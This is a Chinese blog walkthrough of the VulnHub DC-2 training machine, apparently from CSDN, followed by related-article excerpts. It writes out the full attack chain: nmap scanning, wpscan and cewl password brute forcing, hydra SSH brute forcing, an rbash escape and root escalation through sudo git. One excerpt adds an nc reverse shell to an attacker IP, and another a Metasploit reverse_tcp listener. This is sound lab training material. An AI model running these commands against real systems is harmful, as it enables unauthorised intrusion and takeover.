vulnhub靶机渗透DC-2

最新推荐文章于 2024-03-19 17:08:37 发布
原创 最新推荐文章于 2024-03-19 17:08:37 发布 · 266 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

靶机入侵——DC2

1、环境搭建

​ 下载地址:https://www.vulnhub.com/entry/dc-2,311/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里使用主机模式。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24

    在这里插入图片描述

    192.168.80.129 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.129
    在这里插入图片描述

  • 本地修改host文件解析域名,访问web服务:192.168.31.182 dc-2

    windows系统该文件位置:“C:\Windows\System32\drivers\etc\hosts.ics”

    linux系统该文件位置:/etc/hosts

    修改后,成功访问网站并获得flag1

在这里插入图片描述

  • web端进一步信息收集

    在这里插入图片描述

    通过wappalyzer我们发现网站基本信息

3、漏洞探测与利用

  • 根据flag1的提示,我们知道可以通过爬取网站内容来生成字典,爆破后台,这里我们使用wpscan来提取用户名,wpscan是专门最对wordpress的扫描器,命令:wpscan --url dc-2 -e u

    在这里插入图片描述
    在这里插入图片描述

    获得admin、jerry、tom三个用户

  • cewl是一个网页关键字抓取工具。利用网站关键字作为密码继续进行爆破。命令:cewl dc-2 -w pds.txt
    在这里插入图片描述

  • 使用wpscan爆破:wpscan --url dc-2 -U user.txt -P pds.txt
    在这里插入图片描述

    得到两个用户名及密码:jerry/adipiscing 和 tom/parturient

  • 尝试登录后台,默认路径为 wp-admin (如果不是就得尝试爆破)
    在这里插入图片描述

    成功登录,找到flag2

  • 根据提示不能从WordPrss上面找到捷径,登陆tom也没有发现什么,这是时想到了还有7744端口,因为它是ssh协议所以直接尝试ssh连接。由于端口号不是22,所以需要用-p 7744指定端口号。

  • 使用hydra爆破,使用得到的三个用户名以及生成的密码
    hydra -L user.txt -P pds.txt ssh://192.168.80.129:7744 -vV -f -t 4
    在这里插入图片描述

  • 结够发现密码为web后台用户密码,在实际工作中爆破时可以首先尝试相关联账密后空口令。如果能登录将节省大量时间。
    在这里插入图片描述

  • ssh登录,账密:tom/parturient 或者 jerry/adipiscing
    在这里插入图片描述

  • 执行命令发现受到rbash环境的限制,需要绕过rbash限制。
    在这里插入图片描述

  • 使用以下方式绕过,参考链接https://blog.youkuaiyun.com/weixin_43705814/article/details/111879362

    	BASH_CMDS[a]=/bin/sh;a  注:把/bin/bash给a变量`
	export PATH=$PATH:/bin/    注:将/bin 作为PATH环境变量导出
	export PATH=$PATH:/usr/bin   注:将/usr/bin作为PATH环境变量导出

在这里插入图片描述

​ 执行命令绕过,并得到flag3

  • 根据提示,我们得从jerry账户找flag,移动到其家目录,发现了flag4.txt。
    在这里插入图片描述

  • 根据提示,我们需要想办法进行提权

4、权限提升

  • sudo -l #列出目前用户可执行与无法执行的指令
    在这里插入图片描述

  • 发现tom用户无法使用该命令,切换 jerry 用户:su jerry
    在这里插入图片描述

  • 切换后,我们发现。jerry可以使用root权限的git命,强制进入git交互模式,输入下列命令进行提权

    	sudo git help config
		!/bin/bash或者!'sh'完成提权

	sudo git  -p help
		!/bin/bash

在这里插入图片描述

  • 成功提权至root权限,成功找到最后一个flag
    在这里插入图片描述
6.100个渗透测试实战#6(DC2
qwsn
03-26 3430
世间一切皆可努力 感谢浏览 目录...
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 654
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-21 2012
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC-2靶机渗透
告白的博客
07-23 319
0x00 渗透环境介绍 前面通过渗透DC-1,这次我们来研究一下DC-2系列 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 多的就不说了,开干 0x01 信息收集 1)第一步还是需要获取到目标IP地址,靶机与本机环境在同一个,使用扫描域内存活主机 ...
DC-2靶机
qq_40646572的博客
05-04 2079
信息搜集 通过nmap扫描,发现dc2靶机存在80端口以及7744端口。 通过nmap中的-sV指令发现7744端口是ssh端口。 通过nmap中的script的脚本扫描,发现用户名,先保存下。 打开dc2靶机,发现dns解析错误。配置下hosts文件。 Flag搜集 找到flag1。提示使用cewl爬取单词生成字典。 可能存在Ssh爆破,或者http爆破。 经过目录扫描,发现后台。 通过hydra工具爆破http服务。获取到两个登录用户。 存在两个账号: useraname:
靶机渗透DC2
2301_76227305的博客
03-19 830
本次我主要的知识盲区为重定向、wpscan的使用、rbash环境变量的提权,cewl的使用。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
精选资源
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 301
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
精选资源
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
精选资源
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 3174
DC-2靶机渗透测试思路及流程
DC-2靶机渗透学习
里丘~班诺的小屋
09-01 1984
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查找文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
TCP注册端口号大全7
热门推荐
yyfpeak的专栏
03-02 3万+
afs3-fileserver 7000/tcp file server itself afs3-fileserver 7000/udp file server itself afs3-callback 7001/tcp callbacks to cache managers afs3-callback 7001/udp callbacks to cache man
dc-2 靶机渗透学习
..
03-15 1531
网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80、7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可以看到提示不能连接dc-2 造成这样的原因感觉是访问192.168.202.131时,发生了一次跳转到http://dc-2域名,而我们本地的host文件没有对应域名的ip,所以导致访问不成功。 以root身份打开/etc/hosts文件,添加如下内容: 192.168.2
DC系列】DC-2靶机渗透练习
serendipity1130的博客
08-30 421
DC-2: 1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.101.11 2.扫描端口,发现开放了80和7744端口: nmap 192.168.101.11 -p 1-65535 3.但是访问地址发现被重定向到dc-2/,修改hosts文件,添加靶机的IP: vi /etc/hosts 4.修改后可以访问网址发现是wordpress平台,点击进入flag 注:WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQ
Vulnhub靶机系列】DC2
Ms08067安全实验室
04-23 664
文章来源|MS08067 安全实验室本文作者:大方子(Ms08067实验室核心成员)基本信息Kali:192.168.61.145DC2:192.168.61.162实验过程在Kali中先...
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 2017
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
7744
wsnjczw的专栏
03-10 901
aabb问题 1.简单的计算   #include<stdio.h> #include<math.h> int main(){ int a, b, n; double m; for(a = 1; a <= 9; a++){ for(b = 0; b <= 9; b++){ n = a * 1100 + b * 11;...
vulnhub靶场】-dc2
weixin_43446292的博客
04-19 710
1、环境配置 kali:88.16.153.14 dc-2:88.16.153.6 配置hosts文件: linux:vi /etv/hosts 2、信息收集 2.1开放端口:80、7744,且7744是ssh服务,一般是22端口,不太正常 2.2浏览网站,得知CMS是wordpress5.9.3,且有个flag1,内容翻译过来大概意思w为我的密码字典不行,需要使用cewl收集密码,且flag可能在不用用户目录下 2.3 cewl http://dc-2/ -w w.txt,收集密码字典 2.4,由
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值